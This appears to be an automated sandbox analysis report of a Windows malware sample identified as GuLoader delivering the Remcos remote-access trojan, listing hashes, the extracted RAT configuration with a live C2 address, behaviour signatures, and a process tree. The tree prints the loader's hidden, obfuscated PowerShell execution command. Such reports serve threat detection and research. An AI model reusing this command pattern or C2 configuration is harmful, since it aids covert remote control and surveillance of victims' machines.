Overview

overview

10

Static

static

1

PR1000231795.exe

windows7-x64

10

PR1000231795.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    150s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    17-09-2024 07:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PR1000231795.exe

  • Size

    749KB

  • MD5

    cae3afdd724de922b10dd64584e774f1

  • SHA1

    d03bc1c01bd39d1aac23a3bfddf36f47c99f0dcd

  • SHA256

    92d1e524ad186c9eee020e49e42a4b420b8ddaa5f2174690295786df3d9f7cd9

  • SHA512

    8ca15921c8fbd3ecd3cdb05e4587b3836ca71c14032fd80ea50b121e7c7d57e4ba6c58329188649ab52749e631b3fc41fbec56d0ae3160aaee41a0162f2abd8b

  • SSDEEP

    12288:mcBqxnyFHaxV22XOPIUuXiBi/ixxZskvmtPA9Ts0Xz2xZN8EwQUlE7WUC6uI2N6:mGqtyFHaxywzXiumxZNwAy0jmv8XQUOP

Score
10/10
guloaderremcosremotehostdiscoverydownloaderexecutionrat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

23.227.202.48:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-UQVC8D

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\PR1000231795.exe
    "C:\Users\Admin\AppData\Local\Temp\PR1000231795.exe"
    1⤵
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1972
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Sustainment163=Get-Content 'C:\Users\Admin\AppData\Local\pyromanis\Fahrenheittermometret\Harquebusade\Vehefterne\Ewery.Cal';$Underretningernes=$Sustainment163.SubString(702,3);.$Underretningernes($Sustainment163)
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2784
      • C:\Program Files (x86)\windows mail\wabmig.exe
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:3028

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat
    Filesize

    144B

    MD5

    8ac566e8ec0b30237cb375c7239897f1

    SHA1

    eb62807b17e63ec41af796825debf3071d40238a

    SHA256

    88c445a3dbbaaa32e83413580f0b29c21882ea81133a825891c64f85d4cfd932

    SHA512

    1faa2336e2180a15b45d4e63c5cc86d707724eb87bf213da6484dfa12aaaed9ba6026286a1f74d28c58d06ed8beae9bb8e9795cc89168808db6371f6b84666ed

    Download Submit

  • C:\Users\Admin\AppData\Local\pyromanis\Fahrenheittermometret\Harquebusade\Vehefterne\Ewery.Cal
    Filesize

    70KB

    MD5

    c3441391a31d9f2d0e3a28796b372ed7

    SHA1

    17b1fbd3ed6e55a2fa9136d58a4c83dfe5b4d8a1

    SHA256

    c126133825166f5edd56a7bc04f1e62604896b169d2eb23259877e6c3d824da9

    SHA512

    5f8caf6dd323652d820baa7f6d9e58755edd4defaddc0694c1e2d425834fe47a31b4d2e69164ff7a11c7704497d1bf2d27607bd9d18861f96ae2302ca889e31d

    Download Submit

  • C:\Users\Admin\AppData\Local\pyromanis\Fahrenheittermometret\Harquebusade\Velgennemproevet.Sub
    Filesize

    352KB

    MD5

    0f9a0ca4a24509bd1d2745a6df9103c4

    SHA1

    d17e12c3cd1c04e315fd978e33530c5e19e5d0d3

    SHA256

    fb5f515aebeaf042d08c97ae56cbf0bee9997f870447916da7a1127760468e3b

    SHA512

    dd1064f628b4443d3c3ccf27374dd587b1daa4a04442e4b61c19f71d6dc43a7faf5a37dcb187caaa5afa083d8c7bd07497bff2c7784b0064ad86dc2e6bf5ce98

    Download Submit

  • memory/2784-23-0x0000000073CF0000-0x000000007429B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2784-11-0x0000000073CF0000-0x000000007429B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2784-12-0x0000000073CF0000-0x000000007429B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2784-16-0x0000000073CF0000-0x000000007429B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2784-17-0x0000000073CF0000-0x000000007429B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2784-18-0x0000000073CF0000-0x000000007429B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2784-19-0x0000000073CF0000-0x000000007429B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2784-10-0x0000000073CF0000-0x000000007429B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2784-21-0x0000000073CF0000-0x000000007429B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2784-13-0x0000000073CF0000-0x000000007429B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2784-9-0x0000000073CF1000-0x0000000073CF2000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2784-25-0x0000000006160000-0x0000000008FFD000-memory.dmp

    Filesize

    46.6MB

    Download

  • memory/2784-22-0x0000000073CF0000-0x000000007429B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/3028-27-0x0000000000950000-0x00000000019B2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/3028-31-0x0000000000950000-0x00000000019B2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/3028-34-0x0000000000950000-0x00000000019B2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/3028-37-0x0000000000950000-0x00000000019B2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/3028-26-0x00000000019C0000-0x000000000485D000-memory.dmp

    Filesize

    46.6MB

    Download

  • memory/3028-40-0x0000000000950000-0x00000000019B2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/3028-43-0x0000000000950000-0x00000000019B2000-memory.dmp

    Filesize

    16.4MB

    Download